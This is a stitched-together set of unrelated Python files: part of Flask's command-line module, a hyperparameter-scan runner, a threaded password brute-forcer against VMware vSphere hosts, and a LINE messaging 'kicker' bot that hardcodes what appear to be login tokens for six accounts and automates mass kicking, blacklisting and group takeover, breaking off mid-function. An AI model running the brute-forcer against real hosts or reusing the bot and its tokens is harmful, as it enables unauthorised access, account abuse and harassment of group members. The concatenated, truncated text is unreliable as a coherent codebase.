# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
Changes the current working directory to the location of the first file
found, with the assumption that it is in the top level project directory
and will be where the Python path should import local packages from.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path)
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path)
if new_dir and os.getcwd() != new_dir:
os.chdir(new_dir)
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
)
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command():
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to it's configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort, all_methods):
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods))
rule_methods = [", ".join(sorted(rule.methods - ignored_methods)) for rule in rules]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main(as_module=False):
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:], prog_name="python -m flask" if as_module else None)
if __name__ == "__main__":
main(as_module=True)
|
scan_run.py | import os
import multiprocessing
from multiprocessing import Process
try:
import nvidia_smi
except:
pass
os.environ["OBJC_DISABLE_INITIALIZE_FORK_SAFETY"] = "YES"
multiprocessing.set_start_method('fork')
def scan_run(self):
'''The high-level management of the scan procedures
onwards from preparation. Manages round_run()'''
from tqdm import tqdm
from .scan_prepare import scan_prepare
self = scan_prepare(self)
# initiate the progress bar
self.pbar = tqdm(total=len(self.param_object.param_index),
disable=self.disable_progress_bar)
# the main cycle of the experiment
processes = []
total = len(self.param_object.param_index)
count = 0
num_gpus = 0
try:
nvidia_smi.nvmlInit()
num_gpus = nvidia_smi.nvmlDeviceGetCount()
nvidia_smi.nvmlShutdown()
except:
pass
gpu_tickets = [0] * num_gpus
while True:
if self.use_multiprocessing:
while len(processes) >= self.max_processes:
done = multiprocessing.connection.wait([x.sentinel for x in processes])
for p in filter(lambda x: x.sentinel in done, processes):
gpu_id = -1
try:
gpu_id = getattr(p, 'gpu_id')
except:
pass
if gpu_id != -1:
gpu_tickets[gpu_id] -= 1
processes.remove(p)
count += 1
print(f"completed {count} of {total} runs ({(100.0 * count) / total : 0.2f}%)")
self.pbar.update(1)
# get the parameters
self.round_params = self.param_object.round_parameters()
# break when there is no more permutations left
if self.round_params is False:
break
# otherwise proceed with next permutation
from .scan_round import scan_round
if self.use_multiprocessing:
# allocate a GPU
gpu_id = 0
try:
# reuse GPUs
gpu_id = gpu_tickets.index(min(gpu_tickets))
gpu_tickets[gpu_id] += 1
except:
# no GPU available
gpu_id = -1
pass
p = Process(target=scan_round, args=(self,))
self.round_params['GPU_ID'] = gpu_id
setattr(p, 'gpu_id', gpu_id)
processes.append(p)
p.start()
else:
self = scan_round(self)
self.pbar.update(1)
if self.use_multiprocessing:
while len(processes) > 0:
done = multiprocessing.connection.wait([x.sentinel for x in processes])
for p in filter(lambda x: x.sentinel in done, processes):
gpu_id = -1
try:
gpu_id = getattr(p, 'gpu_id')
except:
pass
processes.remove(p)
if gpu_id != -1:
gpu_tickets[gpu_id] -= 1
count += 1
print(f"completed {count} of {total} runs ({(100.0 * count) / total : 0.2f}%)")
self.pbar.update(1)
# close progress bar before finishing
self.pbar.close()
# finish
from ..logging.logging_finish import logging_finish
self = logging_finish(self)
from .scan_finish import scan_finish
self = scan_finish(self)
|
vsphere-brute.py | import optparse
import time
from threading import *
from pysphere import VIServer, VIProperty, MORTypes, VIApiException
from pysphere.resources import VimService_services as VI
from pysphere.vi_task import VITask
import sys
maxConnections = 10
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
# Supporting Functions
def setupConnection(host, user, password, release):
global Found
global Fails
try:
server = VIServer()
server.connect(host, user, password)
print "[+] Password Found: " +password
print "[+] Host: " + host + " Version: " + server.get_server_type() + " " + server.get_api_version() + "\n"
closeConnection(server)
Found = True
except Exception, err:
if 'read_nonblocking' in str(err):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(err):
time.sleep(1)
connect(host, user, password, False)
# else:
# print "error message: " + str(err)
finally:
if release: connection_lock.release()
def closeConnection(server):
server.disconnect()
return None
def main():
parser = optparse.OptionParser('usage %prog '+ '-H <target host> -u <user> -F <password list>'
)
parser.add_option('-H', dest='tgtHost', type='string',help='specify target host')
parser.add_option('-F', dest='passwdFile', type='string',\
help='specify password file')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=setupConnection, args=(host, user,password, True))
child = t.start()
if __name__ == '__main__':
main()
|
ar1.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re
#(qr=True)
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="Enb2crNrFWoERzVn9oVc.b0v8ubUr/rhlN/vtCN3hJa.hGDAlZYQITl7Tsj1ijqDETJAYyoO00tI+MA08eNhTSE=")
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token="EnzLXY3ISqkzq2eVEL69.1g5mFX8xOBfJmY505CbPgq.KM7/hdu2VgE1NZmKv4UlXvpPJ7odTr9RVOB8XcuE7JU=")
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token="EnMunPJLIjFEWNutmX04.09bUyz/9ZLejQ8dwDN41Pa.2mFEKquMtQhr3ilrP2g+s8VBa2TKlapAzBBFMQQRbZk=")
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token="EnX81LUPnDGvVoOUmO5b.5DsNL0uLM2+GNx3rLmG/cW.ugEMUZslok2IDWYIODq0QAttgx0JsKGI5kox6uUVlE0=")
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token="EnGD7RmckF85dv3Z0B63.gGzzZGATpehWNYFKkyWdeW.RHkJgx19A2/ieqvn1CuWhBQikKN3v5G3qHnW8JUln0U=")
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token="EnKhmeJ3uL9qA42d9KF9.ryCu/Bfown4WpN2W5m6Kgq.RgsVZlYT5Olg2RMJO0PhxvVMQSRJUYT8PPekMBRD8YA=")
ki5.loginResult()
print "Iphenk login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""
╔═══════════════════
╠ ✍FAF TEAM BOT✍️
╠❂͜͡➣[Bot]
╠❂͜͡➣[Group id]
╠❂͜͡➣[Ginfo]
╠❂͜͡➣[Mid all]
╠❂͜͡➣[Respon]
╠❂͜͡➣[Speed]
╠❂͜͡➣[Banlist]
╠❂͜͡➣[Gn G.Name]
╠❂͜͡➣[Cancel]
╠❂͜͡➣[Tagall]
╠❂͜͡➣[View]
╠❂͜͡➣[Open]
╠❂͜͡➣[Close]
╠❂͜͡➣[Set]
╠❂͜͡➣[Name: 'text']
╠❂͜͡➣[All: 'text']
╠❂͜͡➣[Setp] [cek]
╠❂͜͡➣[Bc: 'text']
╠❂͜͡➣[FAF out]
╠❂͜͡➣[LG]
╠❂͜͡➣[LG2]
╠❂͜͡➣[Mid @]
╠❂͜͡➣[Bot Like]
╠❂͜͡➣[Like]
╠❂͜͡➣[Check:]
╠❂͜͡➣[Allbio:]
╠❂͜͡➣[Copy]
╠❂͜͡➣[All clone @]
╠❂͜͡➣[Backup]
╚═══════════════════
╔═══════════════════
╠ ✍ KICKER COMMAND ✍️
╠
╠❂͜͡➣[Banned @]
╠❂͜͡➣[Unban @]
╠❂͜͡➣[Kill @]
╠❂͜͡➣[Nk @]
╠❂͜͡➣[Vk @]
╠❂͜͡➣[All]
╠❂͜͡➣[Mayhem]
╠❂͜͡➣[Clear ban]
╠❂͜͡➣[Bom]
╚═══════════════════
"""
Setgroup ="""
╔═══════════════════
╠ ✍ PROTECT ✍️
╠❂͜͡➣[AllProtection]~[Fras on - off]
╠❂͜͡➣[Protect QR]~[Qr on - off]
╠❂͜͡➣[Mid Check]~[Contact On - Off]
╠❂͜͡➣[Reject Invite]~[Bi on - off]
╠❂͜͡➣[Protect Cancel]~[Cn on - off]
╠❂͜͡➣[Member Protect]~[M on - off]
╚═══════════════════
"""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = ki2.getProfile().mid
Cmid = ki3.getProfile().mid
Dmid = ki4.getProfile().mid
Emid = ki5.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,"u07457c501b91f911cb9fe553727dc78c"]
admin = ["u07457c501b91f911cb9fe553727dc78c"]
staff = ["u07457c501b91f911cb9fe553727dc78c"]
adminMID = "u07457c501b91f911cb9fe553727dc78c"
wait = {
'contact':True,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"Thanks for add me",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"IP ディータ",
"cName2":"ディータ1つ " ,
"cName3":"ディータ二人 ",
"cName4":"ディータ三 ",
"cName5":"ディータ4人 ",
"cName6":"ディータ五 ",
"cName7":"ディータ6 ",
"cName8":"ディータ7人 ",
"cName9":"ディータ8人 ",
"cName10":"ディータ9人 ",
"cName11":"ディータ10人 ",
"blacklist":{},
"wblacklist":False,
"dblacklist":True,
"Protectgr":{},
"Protectguest":{},
"Protectcancel":{},
"protectionOn":{},
"atjointicket":True,
"MProtection":{},
"AllProtection":{},
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
setTime = {}
setTime = wait2["setTime"]
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------Protect Qr-------#
if op.type == 11:
if wait["Protectgr"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).updateGroup(G)
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Njiiir")
#------Finish------#
# -INV KICK- #
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 in Bots or staff:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
#--CANCEL KICK--#
if op.type == 32:
if wait["Protectcancel"] == True:
if op.param2 not in Bots or staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
if op.type == 15:
random.choice(KAC).sendText(op.param1, cl.getContact(op.param2).displayName + " Good Bye\n(*´・ω・*)")
print op.param3 + "has left the group"
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.type == 13:
print op.param1
print op.param2
print op.param3
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
